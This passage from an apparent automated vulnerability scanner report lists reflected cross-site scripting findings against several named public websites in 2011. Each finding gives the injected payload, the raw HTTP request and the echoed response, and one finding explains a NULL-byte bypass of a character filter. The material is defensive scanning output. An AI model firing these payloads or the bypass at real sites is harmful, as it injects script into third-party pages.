This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base9a9a7<a>1c64490ce0a/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Wed, 12 Jan 2011 13:01:42 GMT
Last-Modified: Wed, 12 Jan 2011 13:01:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base9a9a7<a>1c64490ce0a/</h1>
...[SNIP]...

3.5. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 918b2"><script>alert(1)</script>616252d6220 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 918b2\"><script>alert(1)</script>616252d6220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?918b2"><script>alert(1)</script>616252d6220=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:33 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Wed, 12 Jan 2011 13:01:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 175876

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?918b2\"><script>alert(1)</script>616252d6220=1#preview" method="post">
...[SNIP]...

3.6. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0025151"><script>alert(1)</script>c59d926219b was submitted in the REST URL parameter 1. This input was echoed as 25151"><script>alert(1)</script>c59d926219b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0025151"><script>alert(1)</script>c59d926219b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454381204777206016%3A154; expires=Thu, 13-Jan-2011 03:35:54 GMT; path=/; domain=digg.com
Set-Cookie: d=1f4f310684a402462325f78fa39217daa6358c237c9a72072efdd2119627f692; expires=Mon, 11-Jan-2021 13:43:34 GMT; path=/; domain=.digg.com
X-Digg-Time: D=193681 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15324

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0025151"><script>alert(1)</script>c59d926219b.rss">
...[SNIP]...

3.7. http://flowplayer.org/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49 was submitted in the REST URL parameter 1. This input was echoed as b7ac8"><img src=a onerror=alert(1)>9fe1b257a49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsb7ac8"><img%20src%3da%20onerror%3dalert(1)>9fe1b257a49/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 12 Jan 2011 13:02:25 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Cache-control: private
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsb7ac8"><img src=a onerror=alert(1)>9fe1b257a49" class="msie tools">
...[SNIP]...

3.8. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99448'-alert(1)-'d32d8b2c2a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:47:03 GMT
Server: TornadoServer/1.0
Content-Length: 2200
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-sm99448'-alert(1)-'d32d8b2c2a0/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...

3.9. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e322<a>bbfd21a913a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?7e322<a>bbfd21a913a=1 HTTP/1.1
Host: mads.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:48:35 GMT
Server: Apache/2.2
Content-Length: 353
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=756
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-15
Expires: Wed, 12 Jan 2011 03:48:35 GMT

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="7e322<a>bbfd21a913a=1" _REQ_NUM="0" --><!-- MAC-AD STATUS: COULD NOT MAP BRAND=&quot;&quot; SITE=&quot;&quot; NCAT=&quot;&quot; PTNR=&quot;2&quot; TO MA
...[SNIP]...

3.10. http://weeklyad.target.com/target/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weeklyad.target.com
Path:   /target/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e73d"-alert(1)-"5a488d4c1ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /target/default.aspx?4e73d"-alert(1)-"5a488d4c1ea=1 HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Cache-Control: private, max-age=0
Expires: Wed, 12 Jan 2011 04:17:13 GMT
Date: Wed, 12 Jan 2011 04:17:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94642


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<html lang
...[SNIP]...
om";
var sl_basedir = "target";
var sl_moviepath = "flash/target/target?ver=090326";
var sl_campaignId = "a4776711305a3c4b";
var sl_querystring = "action=entryflash&4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_usedByIframe = false;
var sl_action = "entryflash";
var sl_fullscreenQS = "4e73d"-alert(1)-"5a488d4c1ea=1";
var sl_sweepstakes = "false";
</script>
...[SNIP]...

3.11. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d881a<script>alert(1)</script>eb1d0c27278 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpd881a<script>alert(1)</script>eb1d0c27278 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=3pg3je3annhr4isubu49p9srm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpd881a<script>alert(1)</script>eb1d0c27278</strong>
...[SNIP]...

3.12. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b72"-alert(1)-"9394725b754 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpc1b72"-alert(1)-"9394725b754 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 12 Jan 2011 04:19:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=rs4f354lgh6a3mh8li873raet1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpc1b72"-alert(1)-"9394725b754";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.13. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a1a"-alert(1)-"c8ee54f2b37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/20a1a"-alert(1)-"c8ee54f2b37 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:18:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/20a1a"-alert(1)-"c8ee54f2b37";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

3.14. http://www.ccmaine.net/AboutUs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea was submitted in the REST URL parameter 1. This input was echoed as 4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUs4f2d8"><img%20src%3da%20onerror%3dalert(1)>d72d4ce88ea HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:00:27 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: d32bdc983db958f343551d76ca24711c
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for AboutUs4f2d8"><img src=a onerror=alert(1)>d72d4ce88ea (RSS)" href="http://www.ccmaine.net/AboutUs4f2d8">
...[SNIP]...

3.15. http://www.ccmaine.net/AboutUs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /AboutUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 was submitted in the REST URL parameter 1. This input was echoed as b5fc4<img src=a onerror=alert(1)>48948eeca42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /AboutUsb5fc4<img%20src%3da%20onerror%3dalert(1)>48948eeca42 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/HomePage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:25 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: e9e010a376fd609f56f2d58330844155
Content-Length: 3256
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : AboutUsb5fc4<img src=a onerror=alert(1)>48948eeca42</h2>
...[SNIP]...

3.16. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 was submitted in the REST URL parameter 1. This input was echoed as 3295c"><img src=a onerror=alert(1)>e19de808de7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicy3295c"><img%20src%3da%20onerror%3dalert(1)>e19de808de7 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:42 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 6629376caca2d486b9c0b94d4f7b4371
Content-Length: 3304
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for BillingPolicy3295c"><img src=a onerror=alert(1)>e19de808de7 (RSS)" href="http://www.ccmaine.net/BillingPolicy3295c">
...[SNIP]...

3.17. http://www.ccmaine.net/BillingPolicy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /BillingPolicy

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 was submitted in the REST URL parameter 1. This input was echoed as dc613<img src=a onerror=alert(1)>3347e2cf2c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /BillingPolicydc613<img%20src%3da%20onerror%3dalert(1)>3347e2cf2c2 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 25e80420e6d313e4fbe6ce792e29fa76
Content-Length: 3291
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
</a> : BillingPolicydc613<img src=a onerror=alert(1)>3347e2cf2c2</h2>
...[SNIP]...

3.18. http://www.ccmaine.net/ContactUs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 was submitted in the REST URL parameter 1. This input was echoed as 34738"><img src=a onerror=alert(1)>df6b78b1cd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs34738"><img%20src%3da%20onerror%3dalert(1)>df6b78b1cd3 HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:41 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: 3c7274efcc40f20baab312a1024e600f
Content-Length: 3279
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Cornerstone Communi
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Cornerstone Communications: High Speed Internet for Rural Maine: revisions for ContactUs34738"><img src=a onerror=alert(1)>df6b78b1cd3 (RSS)" href="http://www.ccmaine.net/ContactUs34738">
...[SNIP]...

3.19. http://www.ccmaine.net/ContactUs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ccmaine.net
Path:   /ContactUs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f was submitted in the REST URL parameter 1. This input was echoed as 516ec<img src=a onerror=alert(1)>286ed71c31f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ContactUs516ec<img%20src%3da%20onerror%3dalert(1)>286ed71c31f HTTP/1.1
Host: www.ccmaine.net
Proxy-Connection: keep-alive
Referer: http://www.ccmaine.net/TechnicalSupport
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1c7b37f4426f042e0fdf703338ebc738=59ae38224ebe5d9ba5edf92778d34129

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:59 GMT
Server: Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
ETag: ec91a7e91eec3db7c10f0659d756670f
Content-Length: 3267
Content-Type: text/html; charset=UTF-8

